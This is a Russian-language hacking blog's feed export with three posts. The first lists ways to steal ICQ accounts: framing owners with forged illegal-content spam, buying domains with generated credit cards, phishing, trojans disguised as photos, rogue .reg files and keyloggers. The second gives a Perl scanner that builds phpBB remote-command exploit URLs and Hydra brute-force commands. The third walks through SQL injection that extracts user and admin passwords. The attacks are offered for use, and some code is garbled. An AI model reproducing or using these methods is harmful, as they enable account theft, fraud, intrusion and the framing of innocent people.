		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=419</guid>
		<description><![CDATA[конецформыначалоформыСпособ #1 Номера первого миллиона регистрировались около 5 лет назад. Поэтому, если пользователь не менял настроек и информации с первой регистрации, то у вас есть шанс обнаружить, что его email-адрес (если он был зарегистрирован на халявном сервере типа yahoo или же hotmail) аннулирован по бездействию. Тогда Вам требуется просто зарегистрить такой же адрес, пойти на [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet119.jpg" alt="интернет" />конецформыначалоформыСпособ #1<br />
Номера первого миллиона регистрировались около 5 лет назад. Поэтому, если пользователь не менял настроек и информации с первой регистрации, то у вас есть шанс обнаружить, что его email-адрес (если он был зарегистрирован на халявном сервере типа yahoo или же hotmail) аннулирован по бездействию. Тогда Вам требуется просто зарегистрить такой же адрес, пойти на http://www.icq.com/password, ввести номер жертвы &#8212; и пароль придёт к вам в свежесделанный почтовый ящик. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить (чем старее номер, тем больше шансов на удачу). Жмите Info. Теперь смотрите на e-mail этого человека. Он должен быть взят на халявном сервере.<span id="more-419"></span> Если он взят не на халявных серверах &#8212; жмите BACK и начните с начала. Теперь &#8212; вам нужно пойти на этот сервер и проверить существование данного e-mail&#8217;а. Если он еще существует &#8212; то идите к началу. Если же его нет &#8212; то вы почти победили. Зарегистрируйте e-mail этого человека (полностью идеентичный). И последнее &#8212; идите в раздел для забывчевых, вводите этот UIN и ваш &#171;новый&#187; e-mail. В ближайшее время вам вышлют пароль!<br />
Способ #2<br />
Существует другой, более сложный варинт лишeния пользователя его e-mail. Есть конкретные правила поведения пользователей сервиса (например: e-mail &#8212; нельзя спамить, web &#8212; нельзя открыто размещать детское порно), нарушая которые пользователи, как правило, лишаются права на адрес или веб-страницу. Кто мешает вам написать несколько десятков тысяч воззваний к легализации детской порнографии и проституции от имени duke@something.com? Установите тип сервера, узнайте язык общения с ним клиента, и пошлите все эти возвания самому себе и своим друзьям (или на другие емейл аккаунты), указав обратным адресом duke@something.com. Далее вы и ваши друзья должны будете переправить все &#171;полученное&#187; от Duke по адресу администратора домена с нотой протеста против легализации и с просьбой наказать виновного. &#171;Послания&#187; Duke следует уничтожить, и в завязавшейся переписке с администрацией сообщить, что следов преступения осталось мало: вы все стерли, так как были шокированны, и праведный гнев обуял вас так сильно, что всем подьездом вас держали. Попросите администратора обязательно держать вас в курсе дела. Далее пошлите сообщение того же самого содержания (используя обратный адрес Duke) другим вашим друзьям или на другие почтовые аккаунты, и напишите администрации о этом безобразии в других словах. Создайте видимость, что этот Duke шлет тысячами сообщения о нелегальных вещах группе незнакомых между собой людей&#8230; Прогнозирую до 80% успеха, у Duke отнимут аккаунт, о чем вам заявят как о большом достижении в борьбе со спамерами и рассадниками порнографии. Вы в тот же день зарегистрируете аккаунт на себя и заявите о потере пассворда. В итоге у вас &#8212; долгожданный UIN и твердая уверенность в том, что если вы имеете бесплатный емейл &#8212; никто никогда у вас его не отнимет.<br />
Будте внимательны, каждое электронное сообщение содержит заголовок (header), представляющий из себя служебную информацию о дате отправления сообщения, названии почтовой программы, IP адресе машины, с которой было отправлено сообщение, и т.д. Поэтому исполюзуйте для этих целей специальные программы для спама, которые способны скрыть эту информацию. Вот некоторые из них: SendIt, EzyMassMailer, CTMailer, MailThemPro и запускайте их через прокси сервер. У большенства спамеров отсутствует в настройках возможность работать через прокси, но это легко поправить с помощью программы SocksCap (программа, позволяющия запускать через сокет любое приложение, о нем не знающее), для коннекта используется проски SOCKS-4 или SOCKS-5 port:1080. Из-под SocksCap вы можете запускать сканеры портов и практически любые программы, скрывая свой реальный IP. Это очень актуально сегодня, т.к многие провайдеры за эти &#171;маленькие<br />
шалости&#187;лишают пользователей доступа в сеть :((</p>
<p>Способ #3<br />
Этот способ требует значительных усилий и основан на том, что многие люди используют в качестве пароля какое-нибудь легковычисляемое слово, например свой ник или имя. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить. Жмите Info. Запомните Uin, ник, настояшее имя пользователя и другие детали. Нажмите на значок ICQ и выберите Add/Change Current User. Жмите Add another registered user, Next, Next. Теперь вводите UIN, а в качестве пароля &#8212; ник, имя или какую-то другую относящуюся к данному пользователю информацию. Вполне возможно, что вам повезёт. Вообще говоря, существует также целый ряд паролей, особенно &#171;любимых&#187; малоопытными пользователями, например &#171;Password&#187;, &#171;qwerty&#187;, &#171;12345&#8243; и т.д. Хотя подбор паролей &#8212; это тема отдельной статьи, и мы не будем здесь подробно на этом останавливаться.</p>
<p>Способ #4<br />
Этот метод основан на том, что многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить ящики aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно, используя любую генерилку кредитных карточек, купить домен www.bbbbb.com и, когда он будет задействован, получить письмо с паролем. Единственное условие: к процессу регистрации домена нужно подходить с умом. Не везде вам позволят купить домен по несуществующей кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный там домен гарантированно просуществует пару недель &#8212; достаточный срок для получения письма.</p>
<p>Способ #5<br />
Если почтовый ящик пользователя существует, и отобрать его никак не получается, можно попробовать его попросту взломать. Конечно, если этот ящик находится у провайдера пользователя, то сделать это будет не так уж и просто. Но если он находится на одном из бесплатных mail-серверов, внимательно следите за сообщениями о новообнаруженных &#171;дырах&#187;: если вам повезёт, вы узнаете способ доступа к интересующему вас почтовому ящику раньше, чем эта &#171;дыра&#187; будет закрыта. А дальше всё просто: вам достаточно забрать из ящика письмо с паролем раньше, чем его заметит владелец ящика. А в качестве примера подобного взлома прочтите эту статью.</p>
<p>Способ #6<br />
Если почтовый ящик защищён хорошо, и взломать его нельзя, можно попробовать получить его пароль. Дело в том, что людям свойственно забывать многие полезные вещи, в том числе и пароли. Поэтому у любой службы бесплатных почтовых ящиков есть некий механизм, с помощью которого можно восстановить &#171;забытый&#187; пароль. При этом вам придётся подтвердить, что вы и есть хозяин того самого ящика. Как правило, для этого необходимо знать краткую информацию о пользователе, такую как имя, фамилия, дата рождения, адрес и т.д. Кроме того, почтовые службы практикуют следующий механизм: при регистрации пользователю предлагается сформулировать некий вопрос личного плана и дать на него ответ. Если потом пользователь заявит об утере пароля, ему будет задан этот вопрос, и если ответ совпадёт, это будет считаться подтверждением личности пользователя. Так вот, 90% пользователей используют вопросы типа &#171;Как зовут мою собаку?&#187;, &#171;Какая марка моего автомобиля?&#187; и т.п., причём уже через год после регистрации они гарантированно не помнят, какой именно вопрос ими был указан. Поэтому, достаточно получасового общения по аське, чтобы как бы случайно сказать что-то вроде &#171;Я очень люблю свою собаку! Она породы волкодав, кличка Дружок. А у тебя есть собака? А какой породы? А как её зовут?&#187;. Если правильно выбрать время и задать вопрос как бы между делом, пользователь наверняка ответит на него, ничего не заподозрив. Точно таким же образом можно узнать и всю остальную информацию, необходимую для получения &#171;забытого&#187; пароля, если, конечно, она не указана в пользовательских деталях ICQ. Если системы автоматического восстановления забытого пароля в данной почтовой службе нет, вам придётся написать слёзное письмо постмастеру, где необходимо будет указать всё те же данные о пользователе. Почтовые мастера &#8212; они люди добрые, они вам помогут. <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /> </p>
<p>Способ #7<br />
Послание якобы от системного администратора (icq_admin@icq.com). Пользователь Алекс UIN 100001, занимается своими обычными делами в режиме онлайн. Он проверяет свой почтовый ящик и обнаруживает там письмо от системного администратора. В письме говорится о том, что ввиду наличия прорех в компьютерной безопасности, пароли пользователей будут теперь изменены: “Ваш новый пароль D4YIL”, — написано в полученном Алексом послании. Вы можете изменить его сами, прямо сейчас, чтобы не терять время и не подвергать себя опасности, или он вступит в силу через 30 минут после получения вами этого уведомления. He забудьте его! Не раскрывайте его никому! Компьютерная безопасность — очень важный аспект, которым нельзя пренебрегать! Затем вы жмете на ICQ &#171;Add another registered user&#187;, вводите выбранный UIN и посланый вами пароль. Если Алекс поверил, то вы получите долгожданный UIN. Возможны и другие разновидности этого способа: например, можно написать подобное письмо, но с требованием установить в качестве Primary E-mail какой-либо адрес, выгядящий достаточно убедительно, но зарегистрированный на вас. Либо можно предложить пользователю внести в список серверов ICQ ip-адрес вашего сервера, мотивируя это перегруженностью сервера icq.mirabilis.com. Можно использовать и другие подходы к пользователю &#8212; здесь всё ограничено только вашей фантазией. &#171;На ура&#187; проходят также и письма &#171;от постмастера&#187; почтовой службы, которую использует жертва. Например, если почтовый ящик пользователя расположен у его провайдера, и он использует POP3-доступ, подойдёт письмо об изменении ip-адреса почтового сервера. Если жертва внесёт указанные вами изменения в настройки своей почтовой программы, то он сам выложит вам свой пароль, связавшись с любезно предоставленным вами подставным POP3-сервером.</p>
<p>Способ #8<br />
Этот путь наиболее широко распространён. Берётся какой-либо свежий почтовый троянец &#8212; например, последняя версия Naebi Soseda, Stealth, Shtirliz, Hooker, GIP (работают под 95/98/NT). Используя Microangelo98 , у него меняется иконка на иконку от графического файла (или любую другую на ваше усмотрение), и сервер трояна после всех манипуляций переименовывается во что-то вроде &#171;photo.jpg (куча пробелов) .exe&#187;. При передаче файла через ICQ будет видно только начало имени, и жертва так ничего и не заподозрит, пока не нажмёт на &#171;open&#187;. Но тогда будет уже поздно. Обычно файл передаётся под видом фотографии после короткой беседы с жертвой. См. также FAQ по троянам на нашем сайте.</p>
<p>Способ #9<br />
Если вы имеете представление о протоколах, по которым ICQ-клиент регистрируется на сервере при каждом подключении к сети, вы можете взять пароль непосредственно из перехваченного сетевого траффика. Для такого перехвата могут быть использованы различные способы. Если ваделец UINа находится в вашей локальной сети, вы можете применить сниффер . Если нет, попробуйте сделать так, чтобы он запустил на своём компьютере .reg-файл, содержащий (помимо полезных действий, например оптимизации файловой системы Windows) строки: [HKEY_CURRENT_USERSoftwareMirabilisICQDefaultPrefs] &#171;Default Server Host&#187;=&#187;Имя или ip-адрес вашего сервера&#187; На этом сервере вам необходимо будет выделить из траффика всю нужную вам информацию, а затем перенаправить его на icq.mirabilis.com. То же самое можно сделать, используюя &#171;фальшивый&#187; прокси-сервер. Кстати, на многих хакерских сайтах сейчас можно найти списки анонимных прокси-серверов. Многие пользователи, желая скрыть свой ip, пользуются их услугами, не подозревая, что часть этих серверов принадлежит весьма любопытным владельцам, а то и спецслужбам некоторых стран. Причина интереса спецслужб проста: раз уж человек желает анонимности, значит ему есть что скрывать. И не надо устанавливать дорогостоющую аппаратуру у всех Интернет-провайдеров, как это пытаются сейчас сделать в России. Достаточно контролировать несколько десятков &#171;анонимных&#187; прокси &#8212; и &#171;клиент&#187; сам себя выдаст! Причём вычислить такое &#171;прослушивание&#187; абсолютно невозможно &#8212; ведь прокси выглядит абсолютно надёжным и анонимным. В принципе, он и является анонимным. Почти для всех. Кроме владельца. Не того, кто указан в базе данных WhoIs, а НАСТОЯЩЕГО владельца.</p>
<p>Способ #10<br />
Удаленный доступ к компьютеру. Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Обычно для этих целей используется троянские кони Back Orifice, NetBus, Sub7 и др. Но они получили слишком широкое распространение и теперь обнаружиавются антивирусами. Так что ищите менее распространенный. Кроме того, возможно удалённое подключение к компьютеру жертвы через 139-й порт по протоколу NetBIOS. Очень часто ресурсы, доступные через этот порт, вообще не имеют пароля, а если этот пароль и присутствует, подбирать его намного быстрее и удобнее, чем, например, регистрационный пароль ICQ. Для этого существует огромное количество специализированных программ, наиболее популярная &#8212; Legion . Вам нужно всего лишь получить системные файлы аськи. А именно: &#171;номер_аси.dat и номер_аси.idx&#187; из каталога &#171;c:program filesicqdb&#187;. Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого UIN-на вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером.</p>
<p>Способ #11<br />
Можно ли изменить пассворд чужого ICQ аккаунта без получения доступа к компьютеру его владельца? Когда-то, во времена icq98, это было возможно. Существовала программа для взлома ICQ под названием &#171;ICQhijeck&#187; (или &#171;ICQhijeek&#187;). При наличии IP жертвы, его UINa и номера порта для связи с клиентом, ICQhijeck посылал spoofed пакет, заявляющий о себе, что пакет принадлежит самому клиенту и несет в себе задачу смены пассворда. Пассворд выбирал нападающий. В конце концов Mirabilis убрал этот баг, но вдруг вам повезёт, и вы найдёте юзера, который не обновлял своего ICQ-клиента в течение последних двух лет.. .</p>
<p>Способ #12<br />
Ещё одна старая уязвимость состояла в том, что при активированном ICQ homepage, был возможен доступ к локальным файлам, используя обратный путь к директориям. Начиная с 99-х версий, ICQ предоставляет пользователям новую, достаточно удобную и простую в реализации возможность &#8212; создать небольшой персональный веб-сервер. При этом, от пользователя требуется минимум усилий &#8212; достаточно выбрать в меню Services -> My ICQ Page -> Activate Homepage. При этом открывается доступ к виртуальному серверу, который по умолчанию расположен на 80 порту компьютера пользователя. Причём этот сервер, без всякой настройки, способен выполнить большинство функций, необходимых типичной домашней страничке. И все бы было хорошо, если бы ни одно: в ранних версиях icq 9 9 был возможен доступ к любому файлу на компьютере пользователя, используя адреса вида: http://текущий.ip.адрес.пользователя/.html&#8230;&#8230;./config.sys. Вообще говоря, обратный путь &#8212; одна из самых типичных ошибок http-серверов. Практически все известные веб-сервера имели тот или иной вариант этой ошибки в своих ранних версиях, и ICQ не стало исключением. Лишь начиная с версии 3.19 эта дыра была закрыта, и всесто доступа к файлам пользователя, обращение к подобным адресам стало приводить к стандартной ошибке 403 Forbidden. Тем не менее, пользователей со старыми версиями ICQ всё ещё можно встретить в сети.</p>
<p>Способ #13<br />
Если у вас есть прямой доступ к компьютеру, на котором стоит интересующая вас ася (или находится любая другая нужная вам информация), просто принести на дискете и установите клавиатурного шпиона, например SAM 007, когда жертва не будет видеть. Вы сможете узнать что, где и когда набиралось на клавиатуре. У вас в руках будет вся интересующая вас информация.</p>
<p>Способ #14<br />
В конце концов, ICQ UIN можно просто купить. При этом ваша совесть будет почти чиста &#8212; вы можете искренне убеждать себя, что купленный вами номер с самого начала принадлежал продавцу и не является краденым. Правда, в этом случае вы должны всегда быть готовы к тому, что в один прекрасный день объявится законный владелец вашего &#171;нового&#187; UINa, и деньги заплаченные за него, окажутся выброшенными на ветер. Да и никто не даст вам гарантию, что после успешно завершённой сделки, UIN не будет украден повторно, на этот раз уже у вас</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-119/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Revese IP, как взломать невзламываемое</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-120/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-120/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=420</guid>
		<description><![CDATA[конецформыначалоформыЕсли взломщику удастся получить шелл-доступ хотя бы с минимальными правами, шансы на взлом резко увеличатся. Посуди сам: имея шелл, хаксор не только сможет путешествовать по файловой системе сервера, которая, возможно, содержит админские бэкапы, файлы с хэшами паролей, суидные программы и прочую инфу, представляющую интерес для взломщика, но и получит возможность запускать соответствующие бажному софту эксплойты, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet120.jpg" alt="интернет" />конецформыначалоформыЕсли взломщику удастся получить шелл-доступ хотя бы с минимальными правами, шансы на взлом резко увеличатся. Посуди сам: имея шелл, хаксор не только сможет путешествовать по файловой системе сервера, которая, возможно, содержит админские бэкапы, файлы с хэшами паролей, суидные программы и прочую инфу, представляющую интерес для взломщика, но и получит возможность запускать соответствующие бажному софту эксплойты, рутающие сервер с помощью локальной уязвимости. И это еще не все. Основная соль заключается в том, что на сервер можно установить консольный брутфорсер Hydra, возможности которого я описывал в соответствующей статье январского выпуска.<span id="more-420"></span> Если натравить эту софтину на нужный локальный SSH/FTP/MySQL-аккаунт, результаты брута превзойдут все ожидания – скорость перебора паролей будет очень высокой, вследствие чего пасс подберется за относительно короткое время. Поэтому первоначальной целью хакера при взломе любого сервера является получение доступа к командному интерпретатору операционной системы компьютера-жертвы.</p>
<p>Ломаем невзламываемое<br />
Итак, задача взломщика на первом этапе сводится к получению шелл-доступа к серваку, на котором крутится ломаемый сайт. Что же делать, если атакуемый ресурс содержит скрипты, в которых напрочь отсутствуют баги, а все демоны, запущенные на сервере, пропатчены? На первый взгляд, ситуация безвыходная – сайт взломать невозможно. Но «невозможно» &#8212; это всего лишь громкое слово, за которым прячутся слабаки и неудачники. Выход в этой ситуации следующий: необходимо найти и поломать другой уязвимый сайт, расположенный на том же сервере, где находится и сайт-жертва, чтобы получить шелл-доступ. Где же намутить список всех сайтов, которые расположены на хостинге? Существует два способа. Если у хостера есть каталог клиентских сайтов, то можно найти через него уязвимый ресурс. Но это слишком нудный, глупый и непрактичный метод по сравнению со вторым.<br />
Идеально было бы иметь огромную таблицу, связывающую доменные имена и IP-адреса в масштабе всей Сети. Однако в силу совершенно другой, более сложной и распределенной структуры DNS, это вряд ли возможно. По крайней мере, не обладая огромными ресурсами, создать такую таблицу непросто (здесь под таблицей я, конечно, не подразумеваю реальную таблицу в БД &#8212; конкретную реализацию мы не обсуждаем). Однако ничего и не надо создавать: проблема давным-давно уже решена. Недавно на сайте www.domainsdb.net открылся сервис, позволяющий легко и быстро получить список всех виртуальных доменов, которые хостятся на одном сервере с указанным в поиске сайтом.</p>
<p>DomainsDB.net<br />
DomainsDB.net – это просто чудо-находка для хакера! Зарегистрировавшись на сервисе, хакер сможет получить список сайтов, хостящихся на произвольном указанном им сервере.<br />
Представь, что кибер-мерзавцу нужно поломать какой-нибудь простой сайт, например www.zhopa.net. И вот что он сделает для этого. Сначала сетевой падонак зайдет на www.domainsdb.net и зарегистрируется. После этого он перейдет на главную страницу сервиса, введет в поле Lookup доменное имя zhopa.net и нажмет на кнопку Enter. Появится страница, содержащая фразу «There are 748 domains on this IP, click here to get them all». Теперь ему нужно кликнуть на ссылку «Click here», и перед ним появится список доменов, которым назначен IP-адрес 64.237.57.92, то есть тот IP, на который ссылается сам zhopa.net . Посуди сам: раз все домены из полученного списка ссылаются на один IP-адрес, значит, сайты, принадлежащие этим доменам, находятся на одном сервере с сайтом www.zhopa.net. Поэтому чтобы получить шелл-доступ к серверу, на котором хостится www.zhopa.net, хакеру нужно поломать хотя бы один сайт из списка, который сгенерил сервис www.domainsdb.net, а это уже очень легко.</p>
<p>Выбираем баг<br />
Несколько месяцев назад был обнаружен баг в движке известного форума phpBB – копатель-ковырятель, выявивший уязвимость, не поленился исследовать кучу php-скриптов на предмет некомпетентного использования функции system(). Уязвимыми оказались все версии до 2.0.10 включительно &#8212; любой скрипткидис запросто может поиметь шелл-доступ к серверу, если на сайте установлен дырявый phpBB. Если помнишь, об этой прорехе в январском номере писали наши сестры милосердия . Форум пользуется бешеной популярностью &#8212; по приблизительным наблюдениям он стоит на каждом сотом сайте в Сети. Если сервис www.domainsdb.net нашел сайтов сто на целевом сервере, то вероятность того, что на хостинге найдется какая-нибудь веб-пага с бажным phpBB, чрезвычайно высока.</p>
<p>Вернемся к первоначальной цели взломщика &#8212; к сайту www.zhopa.net. Кибер-падонок может вручную исследовать сайты из списка на наличие дырявого форума phpBB и найти таковой. Но это может отнять немало времени и сил, которых сайт www.zhopa.net вряд ли стоит.</p>
<p>Пишем крякер инета<br />
Зачем делать монотонную, нудную работу, которую компьютер может сделать за тебя? Безусловно, в данной ситуации хакеру гораздо проще написать программку на перле, которая сама будет тусить по сайтам из сгенерированного сервисом www.domainsdb.net списка и искать форум phpBB. Только представь! Взломщик всего один раз потратит время на ее написание, а пользоваться сможет в любое время сколько угодно раз! Сейчас я попробую реализовать его задумку.<br />
Сорцы скрипта<br />
Код<br />
use LWP::UserAgent;<br />
$source=&#187;in.txt&#187;; $result=&#187;result.htm&#187;;<br />
open (FILE, $source);<br />
while ($str=)<br />
{ if($str=~/[whois]/igs)<br />
{ @str=split (&#187; &#171;, $str);<br />
$site=$str[1];<br />
$url=&#187;http://www.$site/forum&#187;;<br />
find_bug($url,$result);<br />
$url=&#187;http://www.$site/phpbb&#187;;<br />
find_bug($url,$result);<br />
$url=&#187;http://www.$site/phpBB&#187;;<br />
find_bug($url,$result);<br />
$url=&#187;http://forum.$site&#187;;<br />
find_bug($url,$result);<br />
$i++; print &#171;$i: $siten&#187;;<br />
}<br />
}<br />
sub find_bug<br />
{ $url=shift;<br />
$result=shift;<br />
open (RES, &#171;>>$result&#187;);<br />
$browser = LWP::UserAgent->new;<br />
$res=$browser->get($url);<br />
if($res->content =~/viewforum.php/igs)<br />
{ $exploit=&#187;$url/viewtopic.php?t=7&#038;highlight=%2527.$poster=%60$cm d%60.%2527&#038;cmd=uname%20-a&#187;;<br />
print RES &#171;<$exploit>n<br />
$webpage<br />
&#171;;<br />
}<br />
close (RES);<br />
}<br />
Ну вот и все, самописный крякер инета создан и готов к работе! Прежде чем его запустить, нужно сохранить текст web-страницы со списком доменов с сервиса www.domainsdb.net в файле in.txt. После того как программка закончит работу, в файле result.htm не только появится листинг найденных phpBB-форумов, но и ссылки-эксплойты, дающие хакеру доступ к web-шеллу на сайте с бажным phpBB.</p>
<p>Локальный взлом<br />
Если удача улыбнется хакеру, то желанный уязвимый форум найдется и, следовательно, компьютерный негодяй получит возможность исполнять через него команды операционной системы. Но что он будет делать дальше? Ведь хакер не сможет ни изменять, ни даже читать файлы, относящиеся к сайту www.zhopa.net, поскольку шелл получен через бажную хоум-пагу постороннего юзера. Для этого ему придется поломать аккаунт пользователя, которому принадлежит сайт zhopa.net. Про методы локального взлома можно написать не одну статью, но сейчас я расскажу только об одной технологии – о локальном брутфорсе. Для ее реализации падонок сначала выудит из файла /etc/passwd логин целевого пользователя (в нашем случае логин владельца жопа.нет), потом установит на сервер многофункциональный брутфорсер Hydra и начнет с его помощью подбор пароля к FTP/SSH, MySQL-сервису, которым владеет атакуемый юзер. О том, как устанавливать гидру, я уже повествовал пару номеров назад, поэтому сейчас расскажу только о том, как можно юзать ее в данном случае.<br />
Итак, взломщику придется приготовить файл с потенциальными паролями, которые будут использоваться для брута. Он может либо скачать уже готовую подборку паролей с NSD.ru (http://nsd.ru/soft.php?group=hacksoft&#038;razdel=passwords), либо составить свой персональный пасс-лист. Допустим, наш взломщик сохранил пароли в файле pass.txt. Теперь ему нужно натравить гидру на аккаунты zhopa.net, запустив перебор вот так:<br />
hydra -l логин_от_жопа_нет -P pass.txt –t 255 127.0.0.1 ftp<br />
После этого начнется брутфорс-атака FTP-сервиса, использующая 255 потоков. Поскольку взламываемый сервис является локальным, скорость перебора будет максимально высокой и пароль будет очень скоро получен. Если, конечно, перебор не запалит администратор сервера .</p>
<p>Подытожим<br />
Что после всего вышеописанного можно сказать? Все сайты, расположенные на shared-хостингах, увы, уязвимы. Хакеру достаточно запустить наш крякер, и он в считанные минуты получит шелл-доступ к серверу. А security-умелец в момент поднимет свои права до рутовых, после чего сможет сделать с системой все что угодно.</p>
<p>Мнение разработчика сервиса<br />
Служба DomainsDB.net содержит много всевозможной и постоянно обновляемой и пополняемой статистики, сделанной на основе информации о 50 миллионах доменов.<br />
Сервис будет полезен веб-мастерам, интернет-маркетологам, секьюрити-аналитикам и другим IT-специалистам.</p>
<p>Как создать такую базу?<br />
В самом деле, интересно, как же работает этот сервис? Как я уже говорил в статье, идеальным было бы иметь огромную такую табличку с полями «IP-адрес» и «Домен». Оттуда запросом вроде select * from addr where ip=’210.10.40.61’ можно было бы получить все домены, хостящиеся на указанном сервере. Однако, увы, такое наивное решение едва ли реализуемо. Как же быть?<br />
Разумно предположить, что сама служба DNS предоставляет решение этой задачи, однако это не так. Конечно, в DNS есть такое понятие, как файл обратного просмотра, который устанавливает однозначное соответствие между IP-адресами и именами в зоне, однако это не может решить проблему. Единственный путь здесь – это действительно создать огромную базу данных со всеми (ну почти со всеми) доменными именами и IP-адресами. На практике все выглядит не так уж и устрашающе. Давай прикинем, сколько будет весить такая вот база. По самым щедрым оценкам, в инете 70 миллионов доменов второго уровня. Пусть на каждую запись будет отводиться по 300 байт, в этом случае объем базы будет всего-навсего 20 гигабайт. Вполне земные цифры, согласись. Конечно, если уж собирать такую статистику, то необходимо хранить также информацию о динамике, обладать сведениями, как меняется картина во времени. Но все равно создать такую базу вполне реально, для этого не нужно иметь огромный вычислительный кластер, и это проще, чем могло показаться на первый взгляд. Правда, конечно, потребуется большое количество интернет-трафика .</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-120/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Методы взлома</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-121/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-121/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=421</guid>
		<description><![CDATA[конецформыначалоформыЗдравствуйте. Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов. Методы взлома сервера: SQL – injection Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода. Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных, используемых в SQL-запросах. Пример $id = $_REQUEST['id']; [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet121.jpg" alt="интернет" />конецформыначалоформыЗдравствуйте.<br />
Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов.<br />
Методы взлома сервера:<br />
SQL – injection<br />
Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.<br />
Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных,<br />
используемых в SQL-запросах.<br />
Пример<br />
$id = $_REQUEST['id'];<br />
$res = mysql_query(&#171;SELECT * FROM news WHERE id_news = $id&#187;);</p>
<p>http://example.org/script.php?id=5</p>
<p>ставим кавычку</p>
<p>http://example.org/script.php?id=5</p>
<p>Если она не фильтруется то выйдет ошибка:<br />
(Warning: mysql(): supplied argument is not a valid MySQL result resource in)<br />
Далее идет вычисление полей в таблице с помощью параметра ORDER BY<br />
http://example.<span id="more-421"></span>org/script.php?id=5+ORDER+BY+ предполагаемое количество полей &#8212;<br />
Предположим полей 7 из них 3 выводятся на сайте.</p>
<p>http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7&#8212;</p>
<p>Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()</p>
<p>http://example.org/script.php?id=-5+ORDER+&#8230;sion(),4,5,6,7—</p>
<p>На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.<br />
Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.<br />
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME<br />
http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—<br />
Теперь в 3м поле выдут все таблицы которые находятся в базе.</p>
<p>http://example.org/script.php?id=-5+ORDER+&#8230;SCHEMA.COLUMNS—</p>
<p>Все колонки находящиеся в таблицах.<br />
Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address<br />
Составляем запрос</p>
<p>http://example.org/script.php?id=-5+ORDER+&#8230;6,7+FROM+users—</p>
<p>И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.<br />
Остальные поля понятны.<br />
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/<br />
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection<br />
